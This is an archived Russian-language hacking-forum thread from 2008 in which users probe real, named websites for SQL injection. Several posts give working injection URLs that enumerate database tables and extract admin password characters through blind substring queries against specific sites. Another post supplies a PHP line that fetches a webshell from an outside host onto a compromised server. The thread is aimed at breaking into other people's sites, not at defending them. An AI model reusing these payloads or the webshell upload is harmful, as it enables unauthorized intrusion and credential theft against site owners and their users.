ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.12.2008, 22:26
|
|
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078
Репутация:
126
|
|
а вот ещё!
http://www.petarda.ru/default.asp?tmpl=search_list&info=gfd&price_from=& price_to=&orderby=price&ordertype=1%27
пишет: "ошибка БД"
уязвимость?
|
|
|
29.12.2008, 22:31
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
F4R, нет.
|
|
|
|
29.12.2008, 23:02
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от sabe
http://www.xyligan.ru/users/eugenie/blog/blog.php?readpost=4233','')
иьект?
https://forum.antichat.ru/showpost.php?p=307103&postcount=1
Сообщение от F4R
а вот ещё!
http://www.petarda.ru/default.asp?tmpl=search_list&info=gfd&price_from=& price_to=&orderby=price&ordertype=1%27
пишет: "ошибка БД"
уязвимость?
вообще говоря сортировка меняется
_petarda.ru/default.asp?tmpl=search_list&info=%ED%EE%E2%FB%E9& price_from=0&price_to=9999&orderby=price*1
_petarda.ru/default.asp?tmpl=search_list&info=%ED%EE%E2%FB%E9& price_from=0&price_to=9999&orderby=price*-1
но заюзать багу как говорит Никита Литвинков 50/50 (либо получится, либо нет) 
|
|
|
|
29.12.2008, 23:04
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
l1ght
и что? как разкрутить http://www.xyligan.ru/users/eugenie/blog/blog.php?readpost=4233','') там просто нужно закоментировать остальное и составить превельное началало запроса..
Последний раз редактировалось sabe; 30.12.2008 в 06:19..
|
|
|
|
29.12.2008, 23:24
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
2 Thrasher88
Это PostgreSQL, идем сюда и читаем http://forum.antichat.ru/showthread.php?t=35599
Пробуем
http://www.myprof.ru/prof.php?id=1+union+select+null,null,null--
получилось.
Принтабельные поля по статье найти не удалось, хз почему, но пробуем втупую через имя колонки
/prof.php?id=-1+union+select+TABLE_NAME,null,null+from+informati on_schema.tables--
и вуаля таблички есть 
Дальше сам, я не рыл |
|
|
|
30.12.2008, 02:50
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
http://research.sun.com/people/mybio.php?uid=-28941+or+1=1
явахек?))
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+union+select+1,2,3,4,5 ,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+information _schema.tables/*
логический вывод 5 ветка, что поделать?
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+union+select+1+limit+1 ,1/*
не подбор
Последний раз редактировалось sabe; 30.12.2008 в 06:04..
|
|
|
|
30.12.2008, 12:19
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871
Репутация:
16
|
|
проблема такая,есть скуль с возможностью записи в файл,серв на винде,как можно залить вебшелл? инклуде не работает
и еще,когда записываешь в файл прибавляется такая фигня -
202 537 9.pdf 22042 application/pdf 1
1 2 202\ 537\ 9.pdf\ 22042\ application/pdf\ 1\
[сюда_вставляется_все_что_я_ аписываю_через_скуль]\ 2\ 3\ 4\ 5\ 6\
4 5 6
|
|
|
|
30.12.2008, 12:58
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
Napas
есть скуль с возможностью записи в файл,серв на винде,как можно залить вебшелл?
создавай .php файл:
<?php copy("http://site.com/shell.txt","./papka/na/servere/shell.php"); ?>
выполняй его, и shell.php будет твой шелл
Последний раз редактировалось aka PSIH; 30.12.2008 в 13:01..
|
|
|
|
30.12.2008, 13:05
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 15
Провел на форуме:
115871
Репутация:
16
|
|
aka PSIH
не катит (
Warning: copy(D:/Web/cms/xek.php) [function.copy]: failed to open stream: Permission denied in D:\Web\cms\jj.php on line 2
можно ли еще что-нибудь сделать в такой ситуации?
Последний раз редактировалось Napas; 30.12.2008 в 14:20..
|
|
|
|
30.12.2008, 13:24
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
sabe
Что вы так боитесь подзапросы, один раз разобраться, и всё станет понятно в дальнейшем
Вот пример(точнее один из вариантов), всё просто
Подбираем таблицу:
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+AND+lower(substring((s elect+table_name+from+information_schema.tables+li mit+17,1),1,11))='admin_users'
Далее, вывод значения:
http://www.thisibelieve.org/dsp_ShowEssay.php?uid=56362+AND+lower(substring((s elect+password+from+admin_users+limit+0,1),1,2))=' mu'
Это незаконченный вывод
Добивать не стал. кому нужно разберутся )
Разумеется скриптами всё будет гораздо быстрее чем вручную
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
